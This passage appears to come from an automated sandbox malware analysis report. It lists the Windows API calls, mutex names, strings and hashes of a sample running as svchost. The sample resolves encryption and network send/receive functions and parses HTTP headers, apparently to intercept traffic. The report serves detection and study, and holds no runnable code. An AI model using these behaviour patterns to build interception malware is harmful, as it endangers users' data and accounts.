                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02D430DC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D430ED
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D43101
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D4310F
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D42F60,00000000,00000000,00000000), ref: 02D43124
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40), ref: 02D43135
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D4313A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D4314E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D4315C
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7CF94), ref: 02D43167
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,02D7CF94,RSTYLE), ref: 02D43181
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D4318A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}, xrefs: 02D430D0
                                                                                                                                                                                                                • RSTYLE, xrefs: 02D4316D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$RSTYLE
                                                                                                                                                                                                                • API String ID: 505831200-1477618600
                                                                                                                                                                                                                • Opcode ID: e8437f4e58ba90a8990a1949ff3057fef4e69deefff80be59dae606b5e128ca8
                                                                                                                                                                                                                • Instruction ID: 923803d1caba37adba3bd537ed4f33f79dc9e1b39f6a6e930bd98c953ad67086
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8437f4e58ba90a8990a1949ff3057fef4e69deefff80be59dae606b5e128ca8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F411D330A897027BE26057A8AC0EF1A37989F04B14F744644F946A13C0DFE4AD15CABA
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,74DEF550,74DEDF10,02D3549B), ref: 02D392E1
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02D392F3
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,74DEF550,00000000,75BFBD50,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A078
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: memcpy.MSVCRT ref: 02D3A0A0
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: VirtualProtect.KERNEL32(00000000,?,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A135
                                                                                                                                                                                                                  • Part of subcall function 02D3A040: VirtualProtect.KERNEL32(?,00000000,00000040,02D3938A,?,?,?,?,?,?,02D3938A,00000000,02D391E0,02D7A04C), ref: 02D3A14A
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02D39312
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,send), ref: 02D39320
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WSASend), ref: 02D3933C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WSARecv), ref: 02D39358
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,recv), ref: 02D39374
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
                                                                                                                                                                                                                • String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
                                                                                                                                                                                                                • API String ID: 1216545827-2206184491
                                                                                                                                                                                                                • Opcode ID: 6e775ffd8a544ce5baa02cbbed1d4df8839b7637a08362f9e1c7fe752af03dcb
                                                                                                                                                                                                                • Instruction ID: 0d5733379982dc97eb570328f7c1286bb77ebc9d4b231657e8d6099bca204a70
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e775ffd8a544ce5baa02cbbed1d4df8839b7637a08362f9e1c7fe752af03dcb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A01EDA1B8131236F9323675FD2AF9A074D6B45E44F250520B542F3388DAECEC0D8D78
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02D4211C
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D4212D
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D42141
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D4214F
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D41FA0,00000000,00000000,00000000), ref: 02D42164
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40), ref: 02D42175
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D4217A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D4218E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D4219C
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(5e8dc4c1), ref: 02D421A7
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,5e8dc4c1,RAIFF), ref: 02D421C1
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D421CA
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: 5e8dc4c1$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$RAIFF
                                                                                                                                                                                                                • API String ID: 505831200-115387483
                                                                                                                                                                                                                • Opcode ID: 5d5af276196dd8f24db303944955df03741e68359e35fde78185dd42b01765e3
                                                                                                                                                                                                                • Instruction ID: fb864656ec447089fda7fabd5d8772afeb74ac8925ee54f018fc5281bf738779
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d5af276196dd8f24db303944955df03741e68359e35fde78185dd42b01765e3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6211CE30A88312BFF32157A0AC0EF1A3B949F48B55F144904FE46A13C0DFF49C488AB6
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(00402A87,80000000,00000003,00000000,00000003,00000080,00000000,7604DB30,?,00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004013E7
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401403
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401423
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 0040142A
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040143D
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401E04), ref: 0040145A
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401E04), ref: 0040146A
                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401E04), ref: 00401479
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00401E04,00000000,?,00000000,?,?,?,00401E04), ref: 0040148C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014A1
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 004014A4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014B1
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 004014B4
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004014D4
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004014E5
                                                                                                                                                                                                                • IsBadWritePtr.KERNEL32(?,00000004,7604DB30,?,00000000,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 004014F5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHeap$Process$Handle$AllocCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 132362422-0
                                                                                                                                                                                                                • Opcode ID: 2415ac370f488f6398d7920364b1ddac94579256e75289cd9fb9599e4ac2c0e4
                                                                                                                                                                                                                • Instruction ID: 1e88e17013718af7825f0840a72b71bc919ec8abe2a586386afbdd05d1fe9019
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2415ac370f488f6398d7920364b1ddac94579256e75289cd9fb9599e4ac2c0e4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C04156B1900214BBE7219FE59D89FAFBB7CEB84B11F104125FB04B72D0D774594487A8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02D2FF00: memset.MSVCRT ref: 02D2FF54
                                                                                                                                                                                                                  • Part of subcall function 02D2FF00: GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02D2FF6C
                                                                                                                                                                                                                  • Part of subcall function 02D2FF00: HeapValidate.KERNEL32(00000000), ref: 02D2FF6F
                                                                                                                                                                                                                  • Part of subcall function 02D2FF00: GetProcessHeap.KERNEL32(00000000,?), ref: 02D2FF7C
                                                                                                                                                                                                                  • Part of subcall function 02D2FF00: HeapFree.KERNEL32(00000000), ref: 02D2FF7F
                                                                                                                                                                                                                  • Part of subcall function 02D2FF00: InternetQueryOptionA.WININET(?,00000022,00000000,-02D6FAE4), ref: 02D2FF9C
                                                                                                                                                                                                                  • Part of subcall function 02D2FF00: GetProcessHeap.KERNEL32(00000008,00000014), ref: 02D2FFB9
                                                                                                                                                                                                                  • Part of subcall function 02D2FF00: HeapAlloc.KERNEL32(00000000), ref: 02D2FFC0
                                                                                                                                                                                                                  • Part of subcall function 02D2FF00: memset.MSVCRT ref: 02D2FFD0
                                                                                                                                                                                                                • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,02D30DEE,?,?,?,?,?), ref: 02D302E2
                                                                                                                                                                                                                • InternetSetStatusCallback.WININET(?,02D30260), ref: 02D302F6
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00001010,?,?,?,?,?,?,?,?,?,02D30DEE,?,?,?,?), ref: 02D30307
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02D30DEE,?,?,?,?,?), ref: 02D3030E
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D30321
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,02D30DEE,?,?,?,?,?), ref: 02D3035B
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D303A7
                                                                                                                                                                                                                • InternetSetStatusCallback.WININET(?,0000000100000000), ref: 02D303D5
                                                                                                                                                                                                                • SetLastError.KERNEL32(00002EE4,?,?,?,?,?,?,?,?,?,02D30DEE,?,?,?,?,?), ref: 02D30431
                                                                                                                                                                                                                  • Part of subcall function 02D30140: GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D3043D,00000001), ref: 02D3016B
                                                                                                                                                                                                                  • Part of subcall function 02D30140: HeapValidate.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D3016E
                                                                                                                                                                                                                  • Part of subcall function 02D30140: GetProcessHeap.KERNEL32(00000000,?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?), ref: 02D3017B
                                                                                                                                                                                                                  • Part of subcall function 02D30140: HeapFree.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D3017E
                                                                                                                                                                                                                  • Part of subcall function 02D30140: GetHandleInformation.KERNEL32(?,00000000,00000001,00000000,?,?,02D3043D,00000001), ref: 02D30197
                                                                                                                                                                                                                  • Part of subcall function 02D30140: CloseHandle.KERNEL32(?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301A8
                                                                                                                                                                                                                  • Part of subcall function 02D30140: GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D3043D,00000001), ref: 02D301B8
                                                                                                                                                                                                                  • Part of subcall function 02D30140: HeapValidate.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301BB
                                                                                                                                                                                                                  • Part of subcall function 02D30140: GetProcessHeap.KERNEL32(00000000,?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?), ref: 02D301C8
                                                                                                                                                                                                                  • Part of subcall function 02D30140: HeapFree.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301CB
                                                                                                                                                                                                                  • Part of subcall function 02D30140: GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D3043D,00000001), ref: 02D301DB
                                                                                                                                                                                                                  • Part of subcall function 02D30140: HeapValidate.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301DE
                                                                                                                                                                                                                  • Part of subcall function 02D30140: GetProcessHeap.KERNEL32(00000000,?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?), ref: 02D301EB
                                                                                                                                                                                                                  • Part of subcall function 02D30140: HeapFree.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301EE
                                                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02D30DEE,?,?,?,?), ref: 02D3046A
                                                                                                                                                                                                                • IsBadReadPtr.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02D30DEE,?,?,?,?), ref: 02D3047E
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D30493
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeValidate$Internetmemset$AllocCallbackErrorHandleLastReadStatusmemcpy$CloseEventInformationOptionQueryReset
                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                • API String ID: 2621060597-3887548279
                                                                                                                                                                                                                • Opcode ID: c68aba6c1d5c7b04cf20f1ebb734f75b46f8a37a606f23485910d2b3bdc7d4fa
                                                                                                                                                                                                                • Instruction ID: 583a033336a64ba22a22010036a2d04798a92821b12c07584e7026868d3ba931
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c68aba6c1d5c7b04cf20f1ebb734f75b46f8a37a606f23485910d2b3bdc7d4fa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F61AD71604606AFD711DF64D888F6AB3A9FF48715F004A28FA888B740D774ED55CBE1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}), ref: 02D430DC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02D430ED
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D43101
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D4310F
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02D42F60,00000000,00000000,00000000), ref: 02D43124
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40), ref: 02D43135
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D4313A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02D4314E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02D4315C
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02D7CF94), ref: 02D43167
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,02D7CF94,RSTYLE), ref: 02D43181
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02D4318A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}, xrefs: 02D430D0
                                                                                                                                                                                                                • RSTYLE, xrefs: 02D4316D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$RSTYLE
                                                                                                                                                                                                                • API String ID: 505831200-1477618600
                                                                                                                                                                                                                • Opcode ID: 1713e1c3508da5d04130f8afdda7f605b752c4f668a40ba02caf66bee6a69a07
                                                                                                                                                                                                                • Instruction ID: bfbc3e9643aa727bb0b6e3781f151b877f1f36f6bdc33099e81d53aaf1832c31
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1713e1c3508da5d04130f8afdda7f605b752c4f668a40ba02caf66bee6a69a07
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8011CE30A893127FF36157A8AC0EF1E37949F04B15F244648F946A13C0DFB49C198AB6
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • fseek.MSVCRT ref: 02D38236
                                                                                                                                                                                                                • fwrite.MSVCRT ref: 02D38245
                                                                                                                                                                                                                • fseek.MSVCRT ref: 02D3825B
                                                                                                                                                                                                                • fread.MSVCRT ref: 02D38268
                                                                                                                                                                                                                • fseek.MSVCRT ref: 02D382F2
                                                                                                                                                                                                                • fwrite.MSVCRT ref: 02D382FF
                                                                                                                                                                                                                • fclose.MSVCRT ref: 02D38307
                                                                                                                                                                                                                  • Part of subcall function 02D37CD0: fseek.MSVCRT ref: 02D37D5B
                                                                                                                                                                                                                  • Part of subcall function 02D37CD0: fwrite.MSVCRT ref: 02D37D72
                                                                                                                                                                                                                  • Part of subcall function 02D37CD0: fwrite.MSVCRT ref: 02D37D81
                                                                                                                                                                                                                  • Part of subcall function 02D37CD0: fwrite.MSVCRT ref: 02D37DA1
                                                                                                                                                                                                                • free.MSVCRT(?,?,?,?,?,?,?,02D43EB4), ref: 02D38320
                                                                                                                                                                                                                • free.MSVCRT(?,?,?,?,?,?,?,02D43EB4), ref: 02D38326
                                                                                                                                                                                                                • free.MSVCRT(?,?,?,?,?,?,?,02D43EB4), ref: 02D3832C
                                                                                                                                                                                                                • free.MSVCRT(?,?,?,?,?,?,?,02D43EB4), ref: 02D38332
                                                                                                                                                                                                                • free.MSVCRT(?,?,?,?,?,?,?,02D43EB4), ref: 02D3833B
                                                                                                                                                                                                                • free.MSVCRT(?,?,?,?,?,?,?,02D43EB4), ref: 02D38341
                                                                                                                                                                                                                • free.MSVCRT(?,?,?,?,?,?,?,02D43EB4), ref: 02D38344
                                                                                                                                                                                                                • free.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,02D43EB4), ref: 02D38353
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: free$fwrite$fseek$fclosefread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2434908339-0
                                                                                                                                                                                                                • Opcode ID: a382a2cbded399acc1535aeeda628329cf6b6aa88cfcdc33c6a5eb0f54ccdbfa
                                                                                                                                                                                                                • Instruction ID: 34572de42659f1172303ea220c028d02f52f53afa1be30f60bce8cc97270a9f0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a382a2cbded399acc1535aeeda628329cf6b6aa88cfcdc33c6a5eb0f54ccdbfa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4641B1716407059BD720DBA8CC85B6AB3E9FF98710F288A2DF595C7791C278F844CB61
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02D2E8D4
                                                                                                                                                                                                                • StrCmpNIA.SHLWAPI(00000002,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02D2F73F,?,?), ref: 02D2E935
                                                                                                                                                                                                                • StrCmpNIA.SHLWAPI(00000001,?,00000000,?,?,00000000,?,?,?,?,?,?,?,02D2F73F,?,?), ref: 02D2E9F1
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D2EB33
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D2EBEE
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D2EBFF
                                                                                                                                                                                                                • memcpy.MSVCRT ref: 02D2EC31
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                                                                                • String ID: Content-Length$Content-Type$Host$NSS layer$Referer$http://$https://
                                                                                                                                                                                                                • API String ID: 438689982-3158524741
                                                                                                                                                                                                                • Opcode ID: 6a83ebfc51efe0bbf131daee254ea609798161d1bea71a98a0811e88b1c09742
                                                                                                                                                                                                                • Instruction ID: 034b666143971b281d117d2e7e48d6792f6c765cbc254a345b52d2fc4d94eb51
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a83ebfc51efe0bbf131daee254ea609798161d1bea71a98a0811e88b1c09742
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86D1F471E002765BEF318F58C8847EEB7A6AB6531CF48565AD845B7340D730BC49CBA1
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D3043D,00000001), ref: 02D3016B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D3016E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?), ref: 02D3017B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D3017E
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00000000,00000001,00000000,?,?,02D3043D,00000001), ref: 02D30197
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301A8
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D3043D,00000001), ref: 02D301B8
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301BB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?), ref: 02D301C8
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301CB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,?,?,02D3043D,00000001), ref: 02D301DB
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301DE
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?), ref: 02D301EB
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02D3043D,00000001,?,?,?,?,?,?,?,?,?,02D30DEE,?,?), ref: 02D301EE
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
